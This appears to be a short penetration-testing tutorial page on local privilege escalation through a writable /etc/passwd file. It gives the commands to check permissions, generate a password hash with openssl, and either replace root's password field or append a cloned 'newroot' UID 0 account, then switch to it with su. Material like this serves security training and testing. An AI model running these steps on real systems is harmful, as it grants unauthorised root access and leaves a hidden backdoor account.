# Writeable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

#### Investigation and password hash generation

{% code overflow="wrap" %}

```bash
ls -l /etc/passwd
openssl passwd newpasswordhere
nano /etc/passwd
```

{% endcode %}

<div align="left"><figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2FnBhJVDSNboTB87lpDAzv%2Fimage.png?alt=media&#x26;token=adf18d5a-61aa-499f-bee5-79d39dda454c" alt=""><figcaption></figcaption></figure></div>

#### Edit /etc/passwd and add a newly generated password hash

![](https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2F80IHvM5oBUudqM8nqm9Z%2Fimage.png?alt=media\&token=7fc2749e-79bf-4eab-865d-043c21ee14df)

```bash
su root
```

![](https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2F5HX7tSlhLlC0yI5SWV9k%2Fimage.png?alt=media\&token=e541b3ca-3b49-4655-bab0-8343cd2b1ae9)

Alternatively, copy the root user's row and append it to the bottom of the file, changing the first instance of the word "root" to "newroot" and placing the generated password hash between the first and second colon (replacing the "x").

<div align="left"><figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2F9aqbYzZ55fQfdRUCBquR%2Fimage.png?alt=media&#x26;token=1b333edc-a1c9-43c4-9c1a-262f83ddaa5a" alt=""><figcaption></figcaption></figure></div>

Now switch to the newroot user, using the new password.&#x20;

```
su newroot
```